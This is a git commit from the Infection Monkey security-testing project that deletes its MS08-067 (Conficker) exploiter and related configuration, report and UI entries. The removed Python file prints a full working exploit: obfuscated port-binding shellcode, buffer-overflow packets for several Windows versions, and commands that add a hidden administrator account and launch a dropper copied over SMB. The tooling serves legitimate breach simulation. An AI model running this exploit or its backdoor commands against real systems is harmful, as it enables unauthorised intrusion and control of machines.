Agent, Island: Remove MS08_67 exploiter

This commit is contained in:
Ilija Lazoroski 2022-01-27 16:45:55 +01:00
parent 3fc8621e16
commit ff87252a24
11 changed files with 1 additions and 394 deletions

View File

@ -146,9 +146,6 @@ class Configuration(object):
skip_exploit_if_file_exist = False
ms08_067_exploit_attempts = 5
user_to_add = "Monkey_IUSER_SUPPORT"
###########################
# ransomware config
###########################

View File

@ -43,8 +43,6 @@
],
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"ms08_067_exploit_attempts": 5,
"user_to_add": "Monkey_IUSER_SUPPORT",
"ping_scan_timeout": 10000,
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey",

View File

@ -1,320 +0,0 @@
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import socket
import time
from enum import IntEnum
from logging import getLogger
from impacket import uuid
from impacket.dcerpc.v5 import transport
from common.utils.shellcode_obfuscator import clarify
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from infection_monkey.network.smbfinger import SMBFinger
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.utils.commands import build_monkey_commandline
from infection_monkey.utils.random_password_generator import get_random_password
logger = getLogger(__name__)
# Portbind shellcode from metasploit; Binds port to TCP port 4444
OBFUSCATED_SHELLCODE = (
b"4\xf6kPF\xc5\x9b<K\xf8Q\t\xff\xc94\xa9('\xa5%4m\xcd\xa0c\xd9"
b"\xd4Y\xca\x80*\xa7S\x98\xb3n+k\xe5\xe3\xffR\x85\xf4k\xb2\xd3"
b"\xaa\x10*\x0f\xb5\xdc-W(\x9c\xfe\xfa\xb8\x0eT1\xce\x8a\x9b\x0c"
b'\xd4"v\x04\xac~\xec\x04\xb07v\x81\xfd\xed\xd6\x11\x82\xbaN\x1f+'
b"\xd6\x9a\xda\xb5yyP\xf2\r\x8ev\x87\xed\x1eU\xa8\xcd\xc3\xba\x9c"
b"\x02\xf5\x7f\xb1\xed\xfaN(|\xf7\x1aBPw\xdf!\x86\xd2\x8a\xfe\x1b"
b"\x01\xc3\x9d\x802\xeeQ\x13\xff\xde\x95\xe0u\xa5\x19\xc8\xdd"
b"\xab[\x86\xdf\xf8\x84\xc6{\xe0W\x9b\xb0[\x05bA\xfc\xde\xa8B"
b"\x91b\xfey\x152q4\x15\xa7\x91)\xe8\x8b@\xe8\x8bC\xfc\xa6\x7f"
b"\xfc%!_\xef\xe8\x13\xc3\xb4NDA\x0e%\xee\xbdK]L\xa2\x83|\xb3"
b"\xa2\xd3\x97]\xd8b\x03\xa7\x0c}\x93\x85\x18\x16\xff\xf1\xfe"
b"\xff\xe0E\x0b\xb6\xdb\xdc\xe5\xdb\xc5zr\xf1\r3\xd0\xf5\x80"
b"\x89\x86V\x97\x1a\xf2f\x95\x89\xd5\xce\x9a\xee\xa1\xcf\x97"
b"\x92\xc5Bx{7\x0cv\xa6\x9d\xaaf\xa4\xb4\x1e\x9ex\x1f\x91N\xe7ZY"
b"\xa90\xcd\x94\xb7\x800'\r\x19W\x86\x9d~\x87\x9a\x8e\x8c\x90Gq"
b"\x84sB\x07\x10\x8etP\xa5\xfe\x89\x1b\xfe\x0f\xa9&\xab\x19\x1fh"
b"\x18b\xd2y\xbd\xd1\xefe\x14p\xe5{ZW\x00T\xf8\x89\x8d\r\xd48\xb1V"
b"\xd9\xc3%\x89\x9c\x8e\x11\x00\x96\xe3\xd8\x80\\\x07\xc8d\x7f:\xc3T"
b"\xb8\xd1s#\xc0\x04\xcdL\xab\x87\xf0ff\xc2\x02\xe8j\x91\x0eF\x9c[\xb79"
b"\x13J\xcdf\xbd\x83\x84\xe2\x08\xe5\xcf\xb6\xda\xda\x07\xaa$\xfe($"
b"\x86\x0bO\xcb\x8fj\xf6\x15\xb9B\x82\x0c\x7f\xf5!\xad5j\xc7R\x1c"
b"\x95\xe7V^O\xdak\xa0q\x81\xf81\xe3lq{\x0f\xdb\ta\xe7>I,\xab\x1d"
b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J"
b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13"
b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq"
b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8"
b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J"
b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-'
)
SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
XP_PACKET = (
"\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00"
)
# Payload for Windows 2000 target
PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
PAYLOAD_2000 += "\x41\x41"
PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\xeb\xcc"
PAYLOAD_2000 += "\x00\x00"
# Payload for Windows 2003[SP2] target
PAYLOAD_2003 = "\x41\x00\x5c\x00"
PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77"
PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00"
PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae"
PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00"
PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43"
PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff"
PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75"
PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5"
PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6"
PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00"
class WindowsVersion(IntEnum):
Windows2000 = 1
Windows2003_SP2 = 2
WindowsXP = 3
class SRVSVC_Exploit(object):
TELNET_PORT = 4444
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
self._port = port
self._target = target_addr
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
self.os_version = os_version
def get_telnet_port(self):
"""get_telnet_port()
The port on which the Telnet service will listen.
"""
return SRVSVC_Exploit.TELNET_PORT
def start(self):
"""start() -> socket
Exploit the target machine and return a socket connected to it's
listening Telnet service.
"""
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
logger.debug("Initiating exploit connection (%s)", target_rpc_name)
self._trans = transport.DCERPCTransportFactory(target_rpc_name)
self._trans.connect()
logger.debug("Connected to %s", target_rpc_name)
self._dce = self._trans.DCERPC_class(self._trans)
self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0")))
dce_packet = self._build_dce_packet()
self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
logger.debug("Exploit sent to %s successfully...", self._target)
logger.debug("Target machine should be listening over port %d now", self.get_telnet_port())
sock = socket.socket()
sock.connect((self._target, self.get_telnet_port()))
return sock
def _build_dce_packet(self):
if self.os_version == WindowsVersion.WindowsXP:
return XP_PACKET
# Constructing Malicious Packet
dce_packet = "\x01\x00\x00\x00"
dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00"
dce_packet += SHELLCODE
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x00\x00\x00\x00"
dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00"
dce_packet += self._payload
dce_packet += "\x00\x00\x00\x00"
dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00"
dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00"
dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00"
dce_packet += "\x01\x00\x00\x00"
return dce_packet
class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = {
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1": WindowsVersion.WindowsXP,
}
def __init__(self, host):
super(Ms08_067_Exploiter, self).__init__(host)
def is_os_supported(self):
if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list(
self._windows_versions.keys()
):
return True
if not self.host.os.get("type") or (
self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version")
):
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
if is_smb_open:
smb_finger = SMBFinger()
if smb_finger.get_host_fingerprint(self.host):
return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get(
"version"
) in list(self._windows_versions.keys())
return False
def _exploit_host(self):
src_path = get_target_monkey(self.host)
if not src_path:
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
os_version = self._windows_versions.get(
self.host.os.get("version"), WindowsVersion.Windows2003_SP2
)
exploited = False
random_password = get_random_password()
for _ in range(self._config.ms08_067_exploit_attempts):
exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version)
try:
sock = exploit.start()
sock.send(
"cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
random_password,
self._config.user_to_add,
).encode()
)
time.sleep(2)
sock.recv(1000)
logger.debug("Exploited into %r using MS08-067", self.host)
exploited = True
break
except Exception as exc:
logger.debug("Error exploiting victim %r: (%s)", self.host, exc)
continue
if not exploited:
logger.debug("Exploiter MS08-067 is giving up...")
return False
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
self._config.user_to_add,
random_password,
)
if not remote_full_path:
# try other passwords for administrator
for password in self._config.exploit_password_list:
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
"Administrator",
password,
)
if remote_full_path:
break
if not remote_full_path:
return True
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
self._config.dropper_target_path_win_32,
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path
} + build_monkey_commandline(self.host, get_monkey_depth() - 1)
try:
sock.send(("start %s\r\n" % (cmdline,)).encode())
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
except Exception as exc:
logger.debug(
"Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc
)
return True
finally:
try:
sock.close()
except socket.error:
pass
logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
remote_full_path,
self.host,
cmdline,
)
return True

View File

@ -42,17 +42,6 @@ EXPLOITER_CLASSES = {
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
"/exploiters/mssql/",
},
{
"type": "string",
"enum": ["Ms08_067_Exploiter"],
"title": "MS08-067 Exploiter",
"safe": False,
"info": "Unsafe exploiter, that might cause system crash due to the use of buffer "
"overflow. "
"Uses MS08-067 vulnerability.",
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08"
"-067/",
},
{
"type": "string",
"enum": ["SSHExploiter"],

View File

@ -266,24 +266,6 @@ INTERNAL = {
}
},
},
"ms08_067": {
"title": "MS08_067",
"type": "object",
"properties": {
"ms08_067_exploit_attempts": {
"title": "MS08_067 exploit attempts",
"type": "integer",
"default": 5,
"description": "Number of attempts to exploit using MS08_067",
},
"user_to_add": {
"title": "Remote user",
"type": "string",
"default": "Monkey_IUSER_SUPPORT",
"description": "Username to add on successful exploit",
},
},
},
},
"smb_service": {
"title": "SMB service",

View File

@ -34,7 +34,6 @@ class ExploiterDescriptorEnum(Enum):
ELASTIC = ExploiterDescriptor(
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
)
MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
SHELLSHOCK = ExploiterDescriptor(
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
)

View File

@ -30,7 +30,6 @@ import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
import {ms08_067IssueOverview, ms08_067IssueReport} from './security/issues/MS08_067Issue';
import {
crossSegmentIssueOverview,
crossSegmentIssueReport,
@ -136,11 +135,6 @@ class ReportPageComponent extends AuthComponent {
[this.issueContentTypes.REPORT]: powershellIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'Ms08_067_Exploiter': {
[this.issueContentTypes.OVERVIEW]: ms08_067IssueOverview,
[this.issueContentTypes.REPORT]: ms08_067IssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'ZerologonExploiter': {
[this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
[this.issueContentTypes.REPORT]: zerologonIssueReport,

View File

@ -1,24 +0,0 @@
import React from 'react';
import CollapsibleWellComponent from '../CollapsibleWell';
export function ms08_067IssueOverview() {
return (<li>Machines are vulnerable to Conficker (<a
href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067"
>MS08-067</a>). </li>)
}
export function ms08_067IssueReport(issue) {
return (
<>
Install the latest Windows updates or upgrade to a newer operating system.
<CollapsibleWellComponent>
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
className="badge badge-danger">Conficker</span> attack.
<br/>
The attack was made possible because the target machine used an outdated and unpatched operating system
vulnerable to Conficker.
</CollapsibleWellComponent>
</>
);
}

View File

@ -76,7 +76,6 @@
"max_depth": null,
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"ms08_067_exploit_attempts": 5,
"ping_scan_timeout": 1000,
"post_breach_actions": [
"CommunicateAsBackdoorUser",
@ -120,6 +119,5 @@
3306,
7001,
8088
],
"user_to_add": "Monkey_IUSER_SUPPORT"
]
}

View File

@ -121,10 +121,6 @@
"exploit_ssh_keys": [],
"general": {
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"user_to_add": "Monkey_IUSER_SUPPORT"
}
},
"testing": {

View File

@ -59,7 +59,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
MS08_067 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:35)
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
@ -129,7 +128,6 @@ ts # unused variable (monkey/infection_monkey/exploit/zerologon_utils/options.p
opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
_._port # unused attribute (monkey/infection_monkey/exploit/win_ms08_067.py:123)
oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282)
NoInternetError # unused class (monkey/common/utils/exceptions.py:33)